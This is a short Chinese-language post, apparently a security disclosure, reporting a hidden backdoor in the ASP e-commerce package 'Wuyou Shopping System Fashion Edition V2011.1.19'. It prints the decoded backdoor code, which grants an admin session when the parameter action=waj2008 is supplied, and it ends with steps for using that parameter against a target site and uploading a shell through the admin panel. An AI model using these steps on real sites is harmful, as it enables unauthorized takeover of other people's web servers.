程序:无忧购物系统ASP时尚版

漏洞:存在后门,可直接登录拿shell,这后门不知道是本来就有还是另外别人添加的,以前的版本有没有这后门,我倒是没注意了

下载地址:以下两个地址下载的都有后门存在,其他网站的就没有看了

asp/3090.html"> 

后门存在文件:adminxyvipSet.asp

前些天没事干,刚好看到"无忧购物系统ASP时尚版 V2011.1.19",这个版本貌似是新出来的,以前的版本我有看过,漏洞不少,这个版本呢?

刚好今天有时间,就下载过来看了下,没想到漏洞还没找到,后门倒是发现了一个,晕了,漏洞不找也罢,这么大的后门存在,还有什么好找的。。。

在xyvipSet.asp文件中,有一处地方加密了,我就奇怪了,整个程序都没加密,就这地方加密了,有什么奥妙?

==^#~@”

解密了一下,明文出来了

if request("action")="waj2008" then
session("admin")="waj2008"
session("flag")=1
response.Redirect "index.asp"
end if

汗,好嚣张的后门啊

利用方式:?action=waj2008

把替换成你的目标网站即可

进入后台的话,利用上传就可以拿shell了。